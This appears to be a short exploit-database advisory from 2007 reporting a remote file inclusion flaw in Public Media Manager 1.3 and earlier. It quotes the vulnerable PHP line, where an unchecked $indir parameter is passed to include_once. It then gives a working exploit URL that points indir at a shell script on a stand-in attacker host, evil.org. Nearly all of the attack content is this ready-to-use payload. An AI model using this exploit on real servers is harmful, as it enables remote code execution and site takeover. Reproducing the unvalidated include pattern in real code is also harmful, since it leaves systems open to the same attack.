id: 2177
date: 09/27/2007
title: Public Media Manager <= 1.3 Remote File Inclusion Vulnerability
author: 0in
cves: 

===============================================================
Public Media Manager <= 1.3 Remote File Inclusion Vulnerability
===============================================================



#f0und bY 0in
#Download:http://pmm-cms.sourceforge.net/
BUG:
news/newstopic_inc.php:2:if (!empty($indir)) include_once ($indir)."/newsdb/config.php";

Expl0it:
http://x.com/[path]/news/newstopic_inc.php?indir=http://evil.org/shell.txt



#  0day.today [2023-03-24]  #